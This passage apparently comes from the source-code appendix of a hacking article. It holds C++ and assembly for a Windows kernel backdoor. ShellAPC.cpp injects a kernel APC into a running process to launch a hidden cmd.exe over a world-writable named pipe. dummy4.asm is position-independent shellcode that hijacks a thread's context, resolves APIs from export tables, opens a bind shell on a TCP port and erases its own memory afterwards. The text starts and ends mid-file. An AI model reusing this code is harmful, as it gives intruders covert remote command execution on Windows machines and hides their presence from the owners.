      while (1);
}

----[ 8.2 - ShellAPC.cpp

#include <stdio.h>
#include "ntdll.h"
#include "DynLoadFromNtdll.h"
#include "NtdllDynamicLoader.h"
#include "NebbetCreateProcess.h"

//Debug macro
#if (DBG)
#define dbgbkpt __asm int 3
#else
#define dbgbkpt
#endif

//Flag guarantees that thread certainly will execute APC regardless of
//it&#39;s state
#define SPECIAL_KERNEL_MODE_APC 2

namespace NT
{
      extern "C"
      {
// Definitions for Windows NT-supplied APC routines.
// These are exported in the import libraries,
// but are not in NTDDK.H
           void KeInitializeApc(PKAPC Apc,
                PKTHREAD Thread,
                CCHAR ApcStateIndex,
                PKKERNEL_ROUTINE KernelRoutine,
                PKRUNDOWN_ROUTINE RundownRoutine,
                PKNORMAL_ROUTINE NormalRoutine,
                KPROCESSOR_MODE ApcMode,
                PVOID NormalContext);
           
           void KeInsertQueueApc(PKAPC Apc,
                PVOID SystemArgument1,
                PVOID SystemArgument2,
                UCHAR unknown);
      }
}

//Variant of structure SYSTEM_PROCESSES for NT4
namespace NT {
typedef struct _SYSTEM_PROCESSES_NT4 { // Information Class 5
   ULONG NextEntryDelta;
   ULONG ThreadCount;
   ULONG Reserved1[6];
   LARGE_INTEGER CreateTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER KernelTime;
   UNICODE_STRING ProcessName;
   KPRIORITY BasePriority;
   ULONG ProcessId;
   ULONG InheritedFromProcessId;
   ULONG HandleCount;
   ULONG Reserved2[2];
   VM_COUNTERS VmCounters;
   SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES_NT4, *PSYSTEM_PROCESSES_NT4;
}

//Function searches process with given name.
//Writes PID and TID of first thread to ClientId
BOOL FindProcess(PCWSTR process, OUT NT::PCLIENT_ID ClientId)
{
      NT::UNICODE_STRING ProcessName;
      NT::RtlInitUnicodeString(&ProcessName,process);
      ULONG n=0xFFFF;
      //Allocate some memory
      PULONG q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
      //Request information about processes and threads
      //until it will fit in allocated memory.
   while (NT::ZwQuerySystemInformation(NT::SystemProcessesAndThreadsInformation,
        q, n * sizeof *q, 0))
      {
           //If it didn&#39;t fit - free allocated memory...
           NT::ExFreePool(q);
           n*=2;
           //... and allocate twice bigger
           q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
      }

      ULONG MajorVersion;
      //Request OS version
      NT::PsGetVersion(&MajorVersion, NULL, NULL, NULL);

      //Copy pointer to SYSTEM_PROCESSES.
      //copy will be modified indirectly
   NT::PSYSTEM_PROCESSES p = NT::PSYSTEM_PROCESSES(q);
      //"process NOT found" - yet
   BOOL found=0;      
      //Pointer to p will be used to indirect modify p.
      //This trick is needed to force compiler to perform arithmetic operations with p
      //in bytes, not in sizeof SYSTEM_PROCESSES units
      char** pp=(char**)&p;
      //Process search cycle
   do
      {
           //If process have nonzero number of threads (0 threads is abnormal, but possible),
           //has name, that matches looked for...
           if ((p->ThreadCount)&&(p->ProcessName.Buffer)&&(!NT::RtlCompareUnicodeString(&p->ProcessName,&ProcessName,TRUE)))
           {
                //... then copy data about it to variable pointed by ClientId.
                //Accounted for different sizeof SYSTEM_PROCESSES in different versions of NT
                if (MajorVersion<=4)
                      *ClientId = ((NT::PSYSTEM_PROCESSES_NT4)p)->Threads[0].ClientId;
                      else *ClientId = p->Threads[0].ClientId;
                //Set flag "process found"
                found=1;
                //Stop search
                break;
           }
           //No more processes - stop
           if (!(p->NextEntryDelta)) break;
           //Move to next process
           *pp+=p->NextEntryDelta;
      } while(1);
      //Free memory
      NT::ExFreePool(q);
      //Return "is the process found" flag
   return found;
}

//Generates named pipe name similar to used by API-function CreatePipe
void MakePipeName(NT::PUNICODE_STRING KernelPipeName)
{
      //For generation of unrepeating numbers
      static unsigned long      PipeIdx;
      //pseudorandom number
      ULONG                           rnd;           
      //name template
      wchar_t                           *KPNS = L"\\Device\\NamedPipe\\Win32Pipes.%08x.%08x";
      //...and it&#39;s length in bytes
      ULONG                           KPNL = wcslen(KPNS)+(8-4)*2+1;
      //String buffer: allocated here, freed by caller
      wchar_t                           *buf;
      
      //Request system timer: KeQueryInterruptTime is here not for exact
      //counting out time, but for generation of pseudorandom numbers
      rnd = (ULONG)NT::KeQueryInterruptTime();
      //Allocate memory for string
      buf = (wchar_t *)NT::ExAllocatePool(NT::NonPagedPool,(KPNL)*2);
      //Generate name: substitute numbers o template
      _snwprintf(buf, KPNL, KPNS, PipeIdx++, rnd);
      //Write buffer address and string length to KernelPipeName (initialisation)
      NT::RtlInitUnicodeString(KernelPipeName, buf);
}

extern "C" NTSTATUS myCreatePipe1(PHANDLE phPipe, NT::PUNICODE_STRING PipeName, IN ACCESS_MASK DesiredAccess, PSECURITY_DESCRIPTOR sd, ULONG ShareAccess);
extern NTSTATUS BuildAlowingSD(PVOID *sd);

struct APC_PARAMETERS {
      NT::UNICODE_STRING      KernelPipeName;
      ULONG ChildPID;
      };

//APC handler, runs in context of given thread
void KMApcCallback1(NT::PKAPC Apc, NT::PKNORMAL_ROUTINE NormalRoutine,
              PVOID NormalContext, PVOID SystemArgument1,
              PVOID SystemArgument2)
{
      UNREFERENCED_PARAMETER(NormalRoutine);
      UNREFERENCED_PARAMETER(NormalContext);
      
      dbgbkpt;
      //Start process with redirected I/O, SystemArgument1 is named pipe name
      (*(APC_PARAMETERS**)SystemArgument1)->ChildPID=execute_piped(L"\\SystemRoot\\System32\\cmd.exe", &((*(APC_PARAMETERS**)SystemArgument1)->KernelPipeName));
      //Free memory occupied by APC
      NT::ExFreePool(Apc);
      
      //Signal about APC processing completion
      NT::KeSetEvent(*(NT::KEVENT**)SystemArgument2, 0, TRUE);
      return;
}

//Function starts shell process (cmd.exe) with redirected I/O.
//Returns bidirectional named pipe handle in phPipe
extern "C" ULONG StartShell(PHANDLE phPipe)
{
      //_asm int 3;
      HANDLE  hProcess=0, hThread;
      APC_PARAMETERS ApcParameters;
      //Event of APC processing completion
      NT::KEVENT ApcCompletionEvent;
      
      //dbgbkpt;
      NT::CLIENT_ID clid;
      //Look for process to launch shell from it&#39;s context.
      //That process must be always present in system
      if(!FindProcess(/*L"services.exe"*/L"calc.exe",&clid)) {dbgbkpt;
           return FALSE;};
      NT::OBJECT_ATTRIBUTES attr={sizeof(NT::OBJECT_ATTRIBUTES), 0,NULL, OBJ_CASE_INSENSITIVE};
      //Get process handle from it&#39;s PID
      NT::ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &clid);
      if (!hProcess) {dbgbkpt;
           return FALSE;};
      //Get thread handle from it&#39;s TID
      NT::ZwOpenThread(&hThread, THREAD_ALL_ACCESS, &attr, &clid);
      NT::PKTHREAD ThreadObj;
      //Get pointer to thread object from it&#39;s handle
      NT::ObReferenceObjectByHandle(hThread, THREAD_ALL_ACCESS, NULL, NT::KernelMode, (PVOID*)&ThreadObj, NULL);
      
      NT::PKAPC Apc;
      ApcParameters.ChildPID=0;

      //Allocate memory for APC
      Apc = (NT::KAPC*)NT::ExAllocatePool(NT::NonPagedPool, sizeof(NT::KAPC));
      //Initialize APC
      dbgbkpt;
      NT::KeInitializeApc(Apc,
    ThreadObj,
    SPECIAL_KERNEL_MODE_APC,
    (NT::PKKERNEL_ROUTINE)&KMApcCallback1,    // kernel mode routine
    0, // rundown routine
    0,    // user-mode routine
    NT::KernelMode,
      0 //context
      );
      //Initialize APC processing completion event
      NT::KeInitializeEvent(&ApcCompletionEvent,NT::SynchronizationEvent,FALSE);
      
      //Generate random unique named pipe name
      MakePipeName(&ApcParameters.KernelPipeName/*, &UserPipeName*/);
      PVOID sd;
      //Access will be read-only without it.
      //There&#39;s a weak place in the view of security.
      if (BuildAlowingSD(&sd)) return FALSE;
      if (myCreatePipe1(phPipe, &ApcParameters.KernelPipeName, GENERIC_READ | GENERIC_WRITE, sd, FILE_SHARE_READ | FILE_SHARE_WRITE)) return FALSE;
      NT::KeInsertQueueApc(Apc, &ApcParameters, &ApcCompletionEvent, 0);
      NT::KeWaitForSingleObject(&ApcCompletionEvent,NT::Executive,NT::KernelMode,FALSE,NULL);
      NT::RtlFreeUnicodeString(&ApcParameters.KernelPipeName);
      NT::ZwClose(hProcess);
      NT::ZwClose(hThread);
      return ApcParameters.ChildPID;
}

----[ 8.3 - dummy4.asm

;Exported symbols - reference points for automated tool
;which generates C code of hex-encoded string
PUBLIC           Start
PUBLIC           EndFile
PUBLIC           CLID_here
;Debug flag - int 3 in the code
DEBUG           EQU      1
;Falg "accept more then 1 connection"
MULTIPLE_CONNECT      EQU      1
;Falg "bind to next port, if current port busy"
RETRY_BIND      EQU      1

.486            ; processor type
.model flat, stdcall  ; model of memory
option casemap: none  ; disable case sensivity

; includes for file
include Imghdr.inc
include w32.inc
include WSOCK2.INC

; structure initializing
;-------------------------
sSEH STRUCT
OrgEsp        dd ?
SaveEip        dd ?
sSEH ENDS

CLIENT_ID STRUCT
UniqueProcess           dd ?
UniqueThread           dd ?
CLIENT_ID ENDS

OBJECT_ATTRIBUTES STRUCT
Length           dd ?
RootDirectory      dd ?
ObjectName      dd ?
Attributes      dd ?
SecurityDescriptor      dd ?
SecurityQualityOfService      dd ?
OBJECT_ATTRIBUTES ENDS

;-------------------------
.code
;----------------------------------------------
MAX_API_STRING_LENGTH    equ 150
ALLOCATION_GRANULARITY       EQU 10000H
;----------------------------------------------
new_section:
;Macro replaces lea, correcting address for position independency
laa      MACRO      reg, operand
lea      reg, operand
add      reg, FixupDelta
ENDM

;The same, but not uses FixupDelta (autonomous)
laaa      MACRO      reg, operand
local      @@delta
call      $+5
@@delta:
sub       DWORD PTR [esp], OFFSET @@delta
lea      reg, operand
add      reg, DWORD PTR [esp]
add      esp,4
ENDM

main proc
Start:
IFDEF DEBUG
int      3
ENDIF

;Code for evaluating self address
delta:
pop       ebx
sub      ebx,OFFSET delta
;Allocate place for variables in stack
enter      SizeOfLocals,0
;Save difference between load address and ImageBase
mov      FixupDelta,ebx

;Tables, where to write addresses of exported functions
KERNEL32FunctionsTable           EQU      _CreateThread
NTDLLFunctionsTable           EQU      _ZwOpenThread
WS2_32FunctionsTable           EQU      _WSASocket

;Local variables
local flag:DWORD,save_eip:DWORD,_CreateThread:DWORD,_GetThreadContext:DWORD,_SetThreadContext:DWORD,_ExitThread:DWORD,_LoadLibrary:DWORD,_CreateProcessA:DWORD,_Sleep:DWORD,_VirtualFree:DWORD,_ZwOpenThread:DWORD,_ZwAlertThread:DWORD,cxt:CONTEXT,clid:CLIENT_ID,hThread:DWORD,attr:OBJECT_ATTRIBUTES,addr:sockaddr_in,sizeofaddr:DWORD,sock:DWORD,sock2:DWORD,StartInf:STARTUPINFO,ProcInf:PROCESS_INFORMATION,_WSASocket:DWORD,_bind:DWORD,_listen:DWORD,_accept:DWORD,_WSAStartup:DWORD,_closesocket:DWORD,_WSACleanup:DWORD,wsadat:WSAdata,FixupDelta:DWORD =SizeOfLocals
assume fs : nothing
;---- get ImageBase of kernel32.dll ----
lea      ebx,KERNEL32FunctionsTable
push      ebx
laa      ebx,KERNEL32StringTable
push      ebx
push      0FFFF0000h
call GetDllBaseAndLoadFunctions

lea      ebx,NTDLLFunctionsTable
push      ebx
laa      ebx,NTDLLStringTable
push      ebx
push      0FFFF0000h
call GetDllBaseAndLoadFunctions

laa edi, CLID_here
push edi
assume edi:ptr OBJECT_ATTRIBUTES
lea edi,attr
cld
mov      ecx,SIZE OBJECT_ATTRIBUTES
xor      eax,eax
rep stosb
lea edi,attr
mov[edi].Length,SIZE OBJECT_ATTRIBUTES
push edi
push  THREAD_ALL_ACCESS
lea edi,hThread
push      edi
IFDEF DEBUG
int      3
ENDIF
call _ZwOpenThread

lea edi, cxt
assume edi:ptr CONTEXT
mov [edi].cx_ContextFlags,CONTEXT_FULL

xor      ebx,ebx
mov eax,hThread
;there is a thread handle in EAX
;push at once for call many following functions
push edi      ; _SetThreadContext
push eax
;-)
push eax      ; _ZwAlertThread
;-)
push edi      ; _SetThreadContext
push eax
;-)
push edi      ; _GetThreadContext
push eax
call _GetThreadContext

mov      eax,[edi].cx_Eip
mov      save_eip,eax      
laa      eax, new_thread
mov      [edi].cx_Eip, eax

;Self-modify code
;Save EBP to copy current stack in each new thread
laa      eax, ebp_value_here
mov      [eax],ebp
laa      eax, ebp1_value_here
mov      [eax],ebp
;Write addres of flag, that informs of "create main thread" completion
laa      eax, flag_addr_here
lea      ebx,flag
mov      [eax],ebx
mov      flag,0

call _SetThreadContext
;If thread in wait state, it will not run until it (wait) ends or alerted
call _ZwAlertThread      
;not works if wait is nonalertable

;Wait for main thread creation
check_flag:
call      _Sleep,10
cmp      flag,1
jnz      check_flag

;Restore EIP of interupted thread
mov      eax, save_eip
mov      [edi].cx_Eip, eax
call _SetThreadContext

push      0
call _ExitThread

; --- This code executes in interrupted thread and creates main thread ---
new_thread:
IFDEF DEBUG
int 3
ENDIF
ebp1_value_here_2:
mov      ebp,0
lab_posle_ebp1_value:
ORG ebp1_value_here_2+1
ebp1_value_here:
ORG lab_posle_ebp1_value-main
xor        eax,eax
push       eax
push       eax
push       eax
laa       ebx, remote_shell
push       ebx
push       eax
push       eax
call _CreateThread
;call      _Sleep,INFINITE
jmp      $

remote_shell:
IFDEF DEBUG
int 3
ENDIF
ebp_value_here_2:
mov      esi,0
lab_posle_ebp_value:
ORG ebp_value_here_2+1
ebp_value_here:
ORG lab_posle_ebp_value-main
mov      ecx,SizeOfLocals
sub      esi,ecx
mov      edi,esp
sub      edi,ecx
cld
rep movsb
mov      ebp,esp
sub      esp,SizeOfLocals

flag_addr_here_2:
mov      eax,0
lab_posle_flag_addr:
ORG flag_addr_here_2+1
flag_addr_here:
ORG lab_posle_flag_addr-main
mov      DWORD PTR [eax],1

;Load WinSock
laa      eax,szWSOCK32
call _LoadLibrary,eax
or  eax, eax
jz  quit
   
;---- get ImageBase of ws2_32.dll ----
;I&#39;m deviator: load at first, then as if seek :)
lea      ebx,WS2_32FunctionsTable
push      ebx
laa      ebx,WS2_32StringTable
push      ebx
push      eax
call GetDllBaseAndLoadFunctions


;--- telnet server
lea      eax,wsadat
push      eax
push      0101h
call      _WSAStartup

xor      ebx,ebx
;socket does not suit here!
call      _WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,ebx,ebx,ebx
mov      sock,eax

mov      addr.sin_family,AF_INET
mov      addr.sin_port,0088h
mov      addr.sin_addr,INADDR_ANY

;Look for unused port from 34816 and bind to it
retry_bind:
lea      ebx,addr
call      _bind,sock,ebx,SIZE sockaddr_in
IFDEF RETRY_BIND
or        eax, eax
jz        l_listen
lea      edx,addr.sin_port+1
inc      byte ptr[edx]
cmp      byte ptr[edx],0
;All ports busy...
jz      quit      
jmp      retry_bind
ENDIF

l_listen:
call      _listen,sock,1
or        eax, eax
jnz        quit

ShellCycle:

mov      sizeofaddr,SIZE sockaddr_in
lea      eax,sizeofaddr
push      eax
lea      eax, addr
push      eax
push      sock
call      _accept
mov      sock2, eax

RunCmd:

;int      3

;Zero StartInf
cld
lea      edi,StartInf
xor      eax,eax
mov      ecx,SIZE STARTUPINFO
rep      stosb
;Fill StartInf. Shell will be bound to socket
mov      StartInf.dwFlags,STARTF_USESTDHANDLES; OR STARTF_USESHOWWINDOW
mov      eax, sock2
mov      StartInf.hStdOutput,eax
mov      StartInf.hStdError,eax
mov      StartInf.hStdInput,eax
mov      StartInf.cb,SIZE STARTUPINFO

;Start shell
xor      ebx,ebx
lea      eax,ProcInf
push      eax
lea      eax,StartInf
push      eax
push      ebx
push      ebx
push      CREATE_NO_WINDOW
push      1
push      ebx
push      ebx
laa      eax,CmdLine
push      eax
push      ebx
call      _CreateProcessA

;To avoid hanging sessions
call      _closesocket,sock2

IFDEF MULTIPLE_CONNECT
jmp      ShellCycle
ENDIF

quit:
call      _closesocket,sock
call      _WSACleanup
;Sweep traces: free memory with that code and terminate thread
;Code must not free stack because ExitThread address is there
;It may wipe (zero out) stack in future versions
push      MEM_RELEASE
xor      ebx,ebx
push      ebx
push      OFFSET Start
push      ebx
push      _ExitThread
jmp      _VirtualFree
main endp

; ------ ROUTINES ------

; returns NULL in the case of an error
GetDllBaseAndLoadFunctions proc uses edi esi, dwSearchStartAddr:DWORD, FuncNamesTable:DWORD, FuncPtrsTable:DWORD
;----------------------------------------------
local SEH:sSEH, FuncNameEnd:DWORD,dwDllBase:DWORD,PEHeader:DWORD
; install SEH frame
laaa      eax, KernelSearchSehHandler
push      eax
push fs:dword ptr[0]
mov  SEH.OrgEsp, esp
laaa      eax, ExceptCont
mov  SEH.SaveEip, eax
mov  fs:dword ptr[0], esp

; start the search
mov  edi, dwSearchStartAddr
.while TRUE
   .if word ptr [edi] == IMAGE_DOS_SIGNATURE
     mov  esi, edi
     add  esi, [esi+03Ch]
     .if  dword ptr [esi] == IMAGE_NT_SIGNATURE
       .break
     .endif
   .endif
        ExceptCont:
   sub  edi, 010000h
.endw
mov      dwDllBase,edi
mov      PEHeader,esi

LoadFunctions:
; get the string length of the target Api
mov  edi, FuncNamesTable
mov  ecx, MAX_API_STRING_LENGTH
xor  al, al
repnz  scasb
mov      FuncNameEnd,edi
mov  ecx, edi
sub  ecx, FuncNamesTable     ; ECX -> Api string length

; trace the export table
mov  edx, [esi+078h]    ; EDX -> Export table
add  edx, dwDllBase
assume edx:ptr IMAGE_EXPORT_DIRECTORY
mov  ebx, [edx].AddressOfNames    ; EBX -> AddressOfNames array pointer
add  ebx, dwDllBase
xor  eax, eax     ; eax AddressOfNames Index
.repeat
   mov  edi, [ebx]
   add  edi, dwDllBase
   mov  esi, FuncNamesTable
   push ecx   ; save the api string length
   repz cmpsb
   .if zero?
     add  esp, 4
     .break
   .endif
   pop  ecx
   add  ebx, 4
   inc  eax
.until eax == [edx].NumberOfNames

; did we found sth ?
.if eax == [edx].NumberOfNames
   jmp ExceptContinue
.endif

; find the corresponding Ordinal
mov  esi, [edx].AddressOfNameOrdinals
add  esi, dwDllBase
shl  eax, 1
add  eax, esi
movzx      eax,word ptr [eax]

; get the address of the api
mov  edi, [edx].AddressOfFunctions
shl  eax, 2
add  eax, dwDllBase
add  eax, edi
mov  eax, [eax]
add  eax, dwDllBase

mov      ecx,FuncNameEnd
mov      FuncNamesTable,ecx
mov      ebx,FuncPtrsTable
mov      DWORD PTR [ebx],eax
mov      esi,PEHeader
cmp      BYTE PTR [ecx],0
jnz       LoadFunctions

Quit:
; shutdown seh frame
pop  fs:dword ptr[0]
add  esp, 4
ret
ExceptContinue:
mov      edi, dwDllBase
jmp ExceptCont
GetDllBaseAndLoadFunctions endp

KernelSearchSehHandler PROC C pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
mov  eax, pContext
assume eax:ptr CONTEXT
sub  dword ptr [eax].cx_Edi,010000h
mov  eax, 0      ;ExceptionContinueExecution
ret
KernelSearchSehHandler ENDP

KERNEL32StringTable:
szCreateThread       db "CreateThread",0
szGetThreadContext      db "GetThreadContext",0
szSetThreadContext      db "SetThreadContext",0
szExitThread           db "ExitThread",0
szLoadLibrary        db "LoadLibraryA",0
szCreateProcessA      db "CreateProcessA",0
szSleep                db "Sleep",0
szVirtualFree           db "VirtualFree",0
db                0

szWSOCK32           db "WS2_32.DLL",0
WS2_32StringTable:
szsocket           db "WSASocketA",0
szbind                db "bind",0
szlisten           db "listen",0
szaccept           db "accept",0
szWSAStartup           db "WSAStartup",0
szclosesocket           db "closesocket",0
szWSACleanup           db "WSACleanup",0
db                0

NTDLLStringTable:
szZwOpenThread           db "ZwOpenThread",0
szZwAlertThread           db "ZwAlertThread",0
db                0

CmdLine                db      "cmd.exe",0

ALIGN      4
CLID_here           CLIENT_ID <0>

;----------------------------------------------

EndFile:

end Start


----[ 8.4 - NebbetCreateProcess.cpp

#include <ntdll.h>
#include "DynLoadFromNtdll.h"
#include "NtdllDynamicLoader.h"
extern "C" {
#include "SECSYS.H"
}

namespace NT {

typedef struct _CSRSS_MESSAGE{
      ULONG      Unknwon1;
      ULONG      Opcode;
      ULONG      Status;
      ULONG      Unknwon2;
}CSRSS_MESSAGE,*PCSRSS_MESSAGE;

}

DYNAMIC_LOAD1(CsrClientCallServer)
DYNAMIC_LOAD1(RtlDestroyProcessParameters)
DYNAMIC_LOAD1(ZwWriteVirtualMemory)
DYNAMIC_LOAD1(ZwResumeThread)
DYNAMIC_LOAD1(ZwCreateThread)
DYNAMIC_LOAD1(ZwProtectVirtualMemory)
DYNAMIC_LOAD1(ZwCreateProcess)
DYNAMIC_LOAD1(ZwRequestWaitReplyPort)
DYNAMIC_LOAD1(ZwReadVirtualMemory)
DYNAMIC_LOAD1(ZwCreateNamedPipeFile)
DYNAMIC_LOAD1(LdrGetDllHandle)

//Dynamic import of functions exported from ntdll.dll
extern "C" void LoadFuncs()
{
      static PVOID pNTDLL;
      if (!pNTDLL)
      {
           pNTDLL=FindNT();      
           DYNAMIC_LOAD2(CsrClientCallServer)
           DYNAMIC_LOAD2(RtlDestroyProcessParameters)
           DYNAMIC_LOAD2(ZwWriteVirtualMemory)
           DYNAMIC_LOAD2(ZwResumeThread)
           DYNAMIC_LOAD2(ZwCreateThread)
           DYNAMIC_LOAD2(ZwProtectVirtualMemory)
           DYNAMIC_LOAD2(ZwCreateProcess)
           DYNAMIC_LOAD2(ZwRequestWaitReplyPort)
           DYNAMIC_LOAD2(ZwReadVirtualMemory)
           DYNAMIC_LOAD2(ZwCreateNamedPipeFile)
           DYNAMIC_LOAD2(LdrGetDllHandle)
      }
}

//Informs CSRSS about new win32-process
VOID InformCsrss(HANDLE hProcess, HANDLE hThread, ULONG pid, ULONG tid)
{
//      _asm int 3;
   struct CSRSS_MESSAGE {
      ULONG Unknown1;
      ULONG Opcode;
      ULONG Status;
      ULONG Unknown2;
   };

   struct {
           NT::PORT_MESSAGE PortMessage;
      CSRSS_MESSAGE CsrssMessage;
      PROCESS_INFORMATION ProcessInformation;
      NT::CLIENT_ID Debugger;
      ULONG CreationFlags;
      ULONG VdmInfo[2];
   } csrmsg = {{0}, {0}, {hProcess, hThread, pid, tid}, {0}, 0/*STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW*/, {0}};

   CsrClientCallServer(&csrmsg, 0, 0x10000, 0x24);
}

//Initialse empty environment
PWSTR InitEnvironment(HANDLE hProcess)
{
   PVOID p=0;
   DWORD dummy=0;
      DWORD n=sizeof(dummy);
      DWORD m;
      m=n;
      NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &m,
                      MEM_COMMIT, PAGE_READWRITE);
   ZwWriteVirtualMemory(hProcess, p, &dummy, n, 0);
   return PWSTR(p);
}

// Clone of Ntdll::RtlCreateProcessParameters...
VOID RtlCreateProcessParameters(NT::PPROCESS_PARAMETERS* pp,
                                           NT::PUNICODE_STRING      ImageFile,
                                           NT::PUNICODE_STRING      DllPath,
                                           NT::PUNICODE_STRING      CurrentDirectory,
                                           NT::PUNICODE_STRING      CommandLine,
                                           ULONG      CreationFlag,
                                           NT::PUNICODE_STRING      WindowTitle,
                                           NT::PUNICODE_STRING      Desktop,
                                           NT::PUNICODE_STRING      Reserved,
                                           NT::PUNICODE_STRING      Reserved2){

      NT::PROCESS_PARAMETERS*      lpp;

      ULONG      Size=sizeof(NT::PROCESS_PARAMETERS);
      if(ImageFile) Size+=ImageFile->MaximumLength;
      if(DllPath) Size+=DllPath->MaximumLength;
      if(CurrentDirectory) Size+=CurrentDirectory->MaximumLength;
      if(CommandLine) Size+=CommandLine->MaximumLength;
      if(WindowTitle) Size+=WindowTitle->MaximumLength;
      if(Desktop) Size+=Desktop->MaximumLength;
      if(Reserved) Size+=Reserved->MaximumLength;
      if(Reserved2) Size+=Reserved2->MaximumLength;

      //Allocate the buffer..
      *pp=(NT::PPROCESS_PARAMETERS)NT::ExAllocatePool(NT::NonPagedPool,Size);
      lpp=*pp;
      RtlZeroMemory(lpp,Size);

      lpp->AllocationSize=PAGE_SIZE;
      lpp->Size=sizeof(NT::PROCESS_PARAMETERS); // Unicode size will be added (if any)
      lpp->hStdInput=0;
      lpp->hStdOutput=0;
      lpp->hStdError=0;
      if(CurrentDirectory){
           lpp->CurrentDirectoryName.Length=CurrentDirectory->Length;
           lpp->CurrentDirectoryName.MaximumLength=CurrentDirectory->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,CurrentDirectory->Buffer,CurrentDirectory->Length);
           lpp->CurrentDirectoryName.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=CurrentDirectory->MaximumLength;
      }
      if(DllPath){
           lpp->DllPath.Length=DllPath->Length;
           lpp->DllPath.MaximumLength=DllPath->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,DllPath->Buffer,DllPath->Length);
           lpp->DllPath.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=DllPath->MaximumLength;
      }
      if(ImageFile){
           lpp->ImageFile.Length=ImageFile->Length;
           lpp->ImageFile.MaximumLength=ImageFile->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,ImageFile->Buffer,ImageFile->Length);
           lpp->ImageFile.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=ImageFile->MaximumLength;
      }
      if(CommandLine){
           lpp->CommandLine.Length=CommandLine->Length;
           lpp->CommandLine.MaximumLength=CommandLine->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,CommandLine->Buffer,CommandLine->Length);
           lpp->CommandLine.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=CommandLine->MaximumLength;
      }
      if(WindowTitle){
           lpp->WindowTitle.Length=WindowTitle->Length;
           lpp->WindowTitle.MaximumLength=WindowTitle->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,WindowTitle->Buffer,WindowTitle->Length);
           lpp->WindowTitle.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=WindowTitle->MaximumLength;
      }
      if(Desktop){
           lpp->Desktop.Length=Desktop->Length;
           lpp->Desktop.MaximumLength=Desktop->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Desktop->Buffer,Desktop->Length);
           lpp->Desktop.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=Desktop->MaximumLength;
      }
      if(Reserved){
           lpp->Reserved2.Length=Reserved->Length;
           lpp->Reserved2.MaximumLength=Reserved->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Reserved->Buffer,Reserved->Length);
           lpp->Reserved2.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=Reserved->MaximumLength;
      }
/*      if(Reserved2){
           lpp->Reserved3.Length=Reserved2->Length;
           lpp->Reserved3.MaximumLength=Reserved2->MaximumLength;
           RtlCopyMemory((PCHAR)(lpp)+lpp->Size,Reserved2->Buffer,Reserved2->Length);
           lpp->Reserved3.Buffer=(PWCHAR)lpp->Size;
           lpp->Size+=Reserved2->MaximumLength;
      }*/
}

VOID CreateProcessParameters(HANDLE hProcess, NT::PPEB Peb,
                    NT::PUNICODE_STRING ImageFile, HANDLE hPipe)
{
   NT::PPROCESS_PARAMETERS pp;
      NT::UNICODE_STRING           CurrentDirectory;                     
      NT::UNICODE_STRING           DllPath;                     

      NT::RtlInitUnicodeString(&CurrentDirectory,L"C:\\WINNT\\SYSTEM32\\");
      NT::RtlInitUnicodeString(&DllPath,L"C:\\;C:\\WINNT\\;C:\\WINNT\\SYSTEM32\\");
      


   RtlCreateProcessParameters(&pp, ImageFile, &DllPath,&CurrentDirectory, ImageFile, 0, 0, 0, 0, 0);
      
      pp->hStdInput=hPipe;
   pp->hStdOutput=hPipe;//hStdOutPipe;
   pp->hStdError=hPipe;//hStdOutPipe;
      pp->dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
      pp->wShowWindow=SW_HIDE;//CREATE_NO_WINDOW;

   pp->Environment = InitEnvironment(hProcess);
      
   ULONG n = pp->Size;
   PVOID p = 0;
   NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_READWRITE);

   ZwWriteVirtualMemory(hProcess, p, pp, pp->Size, 0);

   ZwWriteVirtualMemory(hProcess, PCHAR(Peb) + 0x10, &p, sizeof p, 0);

   RtlDestroyProcessParameters(pp);
}

namespace NT {
extern "C" {
DWORD WINAPI RtlCreateAcl(PACL acl,DWORD size,DWORD rev);
BOOL    WINAPI RtlAddAccessAllowedAce(PACL,DWORD,DWORD,PSID);
}}

NTSTATUS BuildAlowingSD(PSECURITY_DESCRIPTOR *pSecurityDescriptor)
{
      //_asm int 3;
      SID SeWorldSid={SID_REVISION, 1, SECURITY_WORLD_SID_AUTHORITY, SECURITY_WORLD_RID};
      SID localSid={SID_REVISION, 1, SECURITY_NT_AUTHORITY, SECURITY_LOCAL_SYSTEM_RID};
      char daclbuf[PAGE_SIZE];
      NT::PACL dacl = (NT::PACL)&daclbuf;
      char sdbuf[PAGE_SIZE];
      NT::PSECURITY_DESCRIPTOR sd = &sdbuf;
      
      NTSTATUS status = NT::RtlCreateAcl(dacl, PAGE_SIZE, ACL_REVISION);
   if (!NT_SUCCESS(status)) return status;
   status = NT::RtlAddAccessAllowedAce(dacl, ACL_REVISION, FILE_ALL_ACCESS, &SeWorldSid);
   if (!NT_SUCCESS(status)) return status;
   RtlZeroMemory(sd, PAGE_SIZE);
   status = NT::RtlCreateSecurityDescriptor(sd, SECURITY_DESCRIPTOR_REVISION);
   if (!NT_SUCCESS(status)) return status;
   status = RtlSetOwnerSecurityDescriptor(sd, &localSid, FALSE);
   if (!NT_SUCCESS(status)) return status;
   status = NT::RtlSetDaclSecurityDescriptor(sd, TRUE, dacl, FALSE);
   if (!NT_SUCCESS(status)) return status;
